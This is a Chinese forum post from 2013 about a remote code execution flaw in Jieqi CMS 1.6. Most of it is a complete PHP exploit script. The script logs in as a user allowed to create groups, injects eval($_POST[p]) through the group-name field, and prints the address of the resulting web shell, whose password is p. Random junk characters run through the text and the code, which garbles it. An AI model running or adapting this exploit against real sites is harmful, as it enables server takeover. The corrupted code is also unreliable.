杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
8 X7 f/ E9 v) T* S* ?+ w) A0 @, _( `$ T; S3 d+ B( `& p2 m# y
* w9 B( H/ O: p4 z, W该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
A- y: h$ @9 g2 S) u6 t 需要有一个能创建圈子的用户。: X: i% Q! g5 a& ^* z, v
. ^( ^2 x2 k% S4 k# {
<?php' o3 n- v' ?' }- v$ c
) Z" A% n2 I6 T+ z# i4 ]3 D' H1 aprint_r(' ^% F% R3 N |
+---------------------------------------------------------------------------+
, J, \! X7 k# Z5 }% X2 SJieqi CMS V1.6 PHP Code Injection Exploit y" {2 h: K6 ^( m: P% z
by flyh4t8 s: l O3 _' G8 ]6 b" @0 p7 w
mail: phpsec at hotmail dot com |, N( y8 P. S0 |) {
team: http://www.wolvez.org
9 E# Z0 ^0 C& e) h$ S$ f+---------------------------------------------------------------------------+: N& [) d: Y" t2 r# h: d- R
'); /**6 C$ u) m' M/ q3 ~4 A; V. ~/ Y; K
* works regardless of php.ini settings0 @, ]% ?+ x* V% d: C$ ?7 B+ i
*/ if ($argc < 5) { print_r('+ o" C- q0 b3 q3 u2 ~
+---------------------------------------------------------------------------+: v) A* F* F, _: H7 j/ f
Usage: php '.$argv[0].' host path username
/ ?% l( g4 s; O" ?- @6 v4 _# x& Uhost: target server (ip/hostname)
7 F6 a9 u* ~/ S' w' Q9 T" jpath: path to jieqicms
|7 e) }4 ~! Q3 \9 q: c. \uasename: a username who can create group' R6 ~2 {, _) Q3 ?2 {0 A `. ~
Example:
* H6 H% d) t$ u% s3 f3 a% Y& y4 }( lphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
, U( v2 f' f5 `" p+---------------------------------------------------------------------------+
$ L! q4 M5 J9 p# U5 T! I, G* k* U'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
! L' a( H1 C! Y. F* MContent-Disposition: form-data; name="gname"* \$ o" m$ Q! ?5 ]9 ?# @
0 b9 M4 c; |& I2 W- M
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t- [9 Z& ]# B, i2 k
-----------------------------23281168279961+ O; B' v& ~) |/ f
Content-Disposition: form-data; name="gcatid"5 \( t3 Y+ l2 k0 c$ ~% E- V* F
1 e4 [" q5 z3 H2 N. u# _1 [' M6 t16 b: X/ ~0 \& }9 O/ ?
-----------------------------23281168279961" X1 m- [5 ?' t* i
Content-Disposition: form-data; name="gaudit"$ B9 H. u$ x' Z1 a$ O
& f- Y4 z( w3 J. ]8 V9 b/ B17 b8 z9 L' f' G1 k
-----------------------------23281168279961/ N$ O3 A3 ]: I$ {2 U& j2 A- Y2 w
Content-Disposition: form-data; name="gbrief"
: f7 N( ~* I% n% Z, B 8 {* c3 L) V2 \/ n( g) i0 j) R; V
1
+ K! K: X8 V, N0 S/ N) V" T. B- ]; h-----------------------------23281168279961--) \+ a# A! u, Q$ T! j' s! B
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com+ `# g$ z/ V, D9 |; T
% B, `. Y4 Z V# g- a7 @6 M
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对